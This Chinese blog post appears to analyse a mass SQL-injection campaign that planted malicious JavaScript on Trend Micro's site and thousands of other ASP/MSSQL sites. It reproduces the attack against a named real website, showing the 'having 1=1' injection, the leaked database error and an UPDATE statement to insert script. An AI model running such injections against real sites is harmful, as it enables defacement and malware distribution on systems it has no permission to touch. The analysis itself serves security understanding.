一. 首先在網(wǎng)上找到了這次攻擊的新聞報道 http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通過GOOGLE搜索到了相關(guān)被黑的頁面 http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅儲&meta=&aq=f 趨勢科技的頁面被插入過http://www.2117966.net/f**kjp.js相關(guān)的JS掛馬。
二. 直接查找這個JS相關(guān)的信息 http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 發(fā)現(xiàn)了12,500項符合的結(jié)果，這些返回的結(jié)果信息都是當(dāng)前頁面被插入了JS掛馬。 通過分析發(fā)現(xiàn)被黑的頁面都有如下特征： 1.被修改頁面的網(wǎng)站都是ASP MSSQL的架構(gòu)。 2.被修改的頁面都存在SQL注入漏洞。
三. 取了其中一個被掛馬頁面做了SQL注入掛馬的模擬攻擊： 1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 這個鏈接存在明顯的SQL注入,對person參數(shù)注入語句having 1=1,將暴出當(dāng)前頁面注入點的表名為coordinator，字段名ShCoordinatorSurame。 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————- 2. 修改暴出的當(dāng)前頁面的表名，字段名內(nèi)容為插入JS的代碼來實現(xiàn)掛馬 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1–– 修改coordinator 表 ShCoordinatorSurame 字段內(nèi)容為,同時設(shè)一個1=1為真的邏輯條件就可以修改當(dāng)前頁面查詢數(shù)據(jù)的內(nèi)容. 就可以實現(xiàn)在有SQL注入點的頁面直接掛馬。
四.總結(jié). 這次大規(guī)模攻擊的流程應(yīng)該是自動化的： 1.通過先進(jìn)的掃描技術(shù)批量收集到幾萬網(wǎng)站的SQL注入漏洞。 2.針對漏洞攻擊，進(jìn)行自動化的SQL注入掛馬。 現(xiàn)今雖然SQL注入漏洞已經(jīng)很老了，但是這次黑客在一天內(nèi)同時對數(shù)萬網(wǎng)站攻擊掛馬的技術(shù)卻是很驚人的，連趨勢這樣的安全公司也未能幸免。

最新評論